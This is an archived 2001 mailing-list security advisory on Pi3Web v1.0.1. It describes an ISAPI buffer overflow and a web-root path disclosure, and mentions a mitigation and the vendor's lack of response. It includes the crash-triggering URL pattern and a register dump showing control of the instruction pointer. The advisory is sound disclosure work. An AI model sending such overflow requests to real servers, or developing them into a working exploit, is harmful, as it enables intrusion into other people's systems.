OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: joetestaHUSHMAIL.COM
Date: Thu Feb 15 2001 - 22:21:07 CST

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    ----- Begin Hush Signed Message from joetestahushmail.com -----

    Vulnerabilities in Pi3Web Server

        Overview

    Pi3Web v1.0.1 is a web server available from http://www.zdnet.com. A
    vulnerability exists in the server's internal ISAPI handling procedures
    which results in a buffer overflow. The server also reveals the physical
    path of the web root upon encountering a 404 error.

        Details

    Here is an example URL that overflows a buffer in Pi3Web's executable:

            http://localhost/isapi/tstisapi.dll?[a lot of 'A's]

    This results in the following crash:

    ENHPI3 caused an invalid page fault in
    module <unknown> at 0000:41414141.
    Registers:
    EAX=00000001 CS=017f EIP=41414141 EFLGS=00010206
    EBX=0123d1b0 SS=0187 ESP=041df3b0 EBP=041dfed4
    ECX=00000000 DS=0187 ESI=041df3f0 FS=3e6f
    EDX=00000000 ES=0187 EDI=00000000 GS=0000
    Bytes at CS:EIP:

    Stack dump:
    41414141 41414141 41414141 41414141
    41414141 41414141 41414141 41414141
    41414141 41414141 41414141 41414141
    41414141 00bb0b2c 00000000 05611030

    To discover the physical path of the web root:

            http://localhost/[any string which causes a 404 error]

    The server responds with:

            The original URL path was:
            /sadfasdf

            The mapped physical path was:
            C:\PI3WEB\WebRoot\sadfasdf

        Solution

    The buffer overflow can be prevented by deleting the ISAPI module named
    'tstisapi.dll'. There is no quick solution for the web root disclosure.

        Vendor Status

    The author, John Roy, was contacted via <jproyWORLD.STD.COM> on Monday,
    February 5, 2001. No reply was received.

        - Joe Testa ( e-mail: joetestahushmail.com / AIM: LordSpankatron )

    ----- Begin Hush Signature v1.3 -----
    B2izikZHXZBSe741WqgWmHVTt5g5goAcqJzAz0tPWIrMzvB0fUWonV8Q6SUq4x4PTs+t
    Fqyz4+UGHO1T/IunO4J4uML1McFFFDLqSXJDyeZYd6ZvryQzRY+6WEeaBEVFFLI5X+yq
    F/nobN22dvqdFHrJ9PVBdYa88NieXkpAY1el3gHXiaGqYcWM1lMoub5WttkwNx9Irzpb
    CJlaASStNBTRBkSn84x5YkgDOgiANl7VafyNamn3X3uhJ5SHghXnUCvpueGKj6Yna9Dv
    wKHdyV3pg2r/UiFOfx7fy4BC5L8VOSsQZl420F1rBLxdwpnqqU3g8yiTsSs2HxG3arIF
    /xxa9llCxo+zKaGppx/6HGIhF8k2S6qfJcYlgmd5YhdQWMuH0A/XQhqxIGNxgJ6nY7mU
    qbAW7gyoXV0OFYQivjHzq6zaLE8Q7uGqBodkF/CkvbuXSAeENgECSew5bz2EblGV1Ymb
    6VlmOeX5w964o01o2/2v+oFNItGYbD9N9LkHNSwNjwH4
    ----- End Hush Signature v1.3 -----
    \n\nThis message has been signed with a Hush Digital Signature. \nTo verify the signature, please go to www.hush.com/tools\n\n

    IMPORTANT NOTICE: If you are not using HushMail, this message could have been read easily by the many people who have access to your open personal email messages.
    Get your FREE, totally secure email address at http://www.hushmail.com.